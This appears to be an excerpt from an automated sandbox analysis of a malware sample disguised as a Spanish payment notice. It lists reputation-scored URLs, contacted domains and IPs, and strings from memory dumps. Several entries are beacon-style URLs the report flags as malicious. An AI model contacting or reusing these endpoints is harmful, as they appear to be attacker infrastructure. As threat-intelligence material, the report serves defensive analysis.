          http://www.evertribute.com/d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgb0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.founder.com.cn/cnG0%URL Reputationsafe
          http://www.sajatypeworks.comG0%Avira URL Cloudsafe
          http://www.librevillegabon.com/d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgb0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.galapagosdesign.com/n0%Avira URL Cloudsafe
          http://www.fontbureau.comB.TTF?m0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Y0?m0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/hm?0%Avira URL Cloudsafe
          http://www.fontbureau.comcom0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/6m0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Y00%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sajatypeworks.come0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.fontbureau.com.TTF0%URL Reputationsafe
          http://www.theguiriguide.com/d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgb0%Avira URL Cloudsafe
          http://www.sajatypeworks.comt0%URL Reputationsafe
          http://www.sajatypeworks.comt-bh0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Zm0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.fontbureau.coma0%URL Reputationsafe
          http://www.fontbureau.como)m0%Avira URL Cloudsafe
          http://www.fontbureau.comd0%URL Reputationsafe
          http://en.w0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/)m0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          www.hkqhdq.com/d6fp/0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cnnt0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Dm0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/20%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/cm60%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/qm(0%Avira URL Cloudsafe
          http://www.founder.com.cn/cne-dio0%Avira URL Cloudsafe
          http://www.fontbureau.comm0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/~mQ0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/Mm0%Avira URL Cloudsafe
          http://www.fontbureau.comsief0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.triptoasiam.com
          		162.0.216.71
          		truefalse
            		unknown
            www.massage-rino.com
            		38.40.251.97
            		truefalseunknown
            theguiriguide.com
            		192.0.78.25
            		truetrueunknown
            parkingpage.namecheap.com
            		198.54.117.212
            		truefalse
              		high
              www.librevillegabon.com
              		104.195.7.239
              		truetrue
                		unknown
                www.theguiriguide.com
                		unknown
                		unknowntrue
                  		unknown
                  www.team-ctctitleco.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.evertribute.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.evertribute.com/d6fp/?7nxh=0IAMhpyfM6TyxYvNuQBLxFd+VBe1OVp7bFg/8SsVn3OL4Z0v7SAtnQzd8ZWN+7APMfoM&q6AlF=0txdQnwxgbtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.librevillegabon.com/d6fp/?7nxh=27dTALvGagYo6W4eiFO6YvZJ//Zn5pBdCa2l5DH7HNM2RGs4GWZbOB9vu5aCQaLmGkAl&q6AlF=0txdQnwxgbtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.theguiriguide.com/d6fp/?7nxh=Vjw903Y9bM1AKbFW1pqe+tE50cefuwUzuT8QLR39Zk9vkX5o4NYForbp6qTr1jJAF4yG&q6AlF=0txdQnwxgbtrue
                      • Avira URL Cloud: safe
                      		unknown
                      www.hkqhdq.com/d6fp/true
                      • Avira URL Cloud: safe
                      		low

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.fontbureau.com/designersGNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.fontbureau.comlvfetDmNotificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fontbureau.com/designers/?Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.founder.com.cn/cn/bTheNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.fontbureau.com/designers/cabarga.html0Notificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers?Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.tiro.comNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designersNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.goodfont.co.krNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cnGNotificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comGNotificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.sajatypeworks.comNotificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263447229.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.typography.netDNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.founder.com.cn/cn/cTheNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/staff/dennis.htmNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://fontfabrik.comNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/nNotificaci#U00f3n de pago.exe, 00000000.00000003.277842098.0000000005FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.comB.TTF?mNotificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/Y0?mNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/hm?Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.comcomNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.galapagosdesign.com/DPleaseNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/6mNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.jiyu-kobo.co.jp/Y0Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fonts.comNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.sandoll.co.krNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.urwpp.deDPleaseNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.zhongyicts.com.cnNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comeNotificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sakkal.comNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com.TTFNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.apache.org/licenses/LICENSE-2.0Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.comNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sajatypeworks.comtNotificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267071973.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.sajatypeworks.comt-bhNotificaci#U00f3n de pago.exe, 00000000.00000003.267557028.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265054289.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267273158.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264590356.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264694065.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268115380.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267166340.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264094876.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266446750.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266607005.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265196390.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265228038.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264926337.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265917644.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264428081.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263906770.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264561984.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268009733.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.264304896.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.263447229.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.267765595.0000000005FAB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/ZmNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/jp/Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.comaNotificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.312759063.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.307819527.0000000005F90000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.como)mNotificaci#U00f3n de pago.exe, 00000000.00000003.283274028.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000002.312759063.0000000005F90000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.307819527.0000000005F90000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		low
                                      http://www.fontbureau.comdNotificaci#U00f3n de pago.exe, 00000000.00000003.275317837.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.275623975.0000000005F98000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://en.wNotificaci#U00f3n de pago.exe, 00000000.00000003.263896171.0000000005F96000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/)mNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.carterandcone.comlNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cnNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266184528.0000000005F97000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.266049177.0000000005F98000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.265980144.0000000005F97000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers/frere-jones.htmlNotificaci#U00f3n de pago.exe, 00000000.00000002.313327402.0000000007222000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.founder.com.cn/cnntNotificaci#U00f3n de pago.exe, 00000000.00000003.265980144.0000000005F97000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/DmNotificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.galapagosdesign.com/2Notificaci#U00f3n de pago.exe, 00000000.00000003.277842098.0000000005FC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.jiyu-kobo.co.jp/cm6Notificaci#U00f3n de pago.exe, 00000000.00000003.268786544.0000000005F9B000.00000004.00000800.00020000.00000000.sdmp, Notificaci#U00f3n de pago.exe, 00000000.00000003.268937816.0000000005F9B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
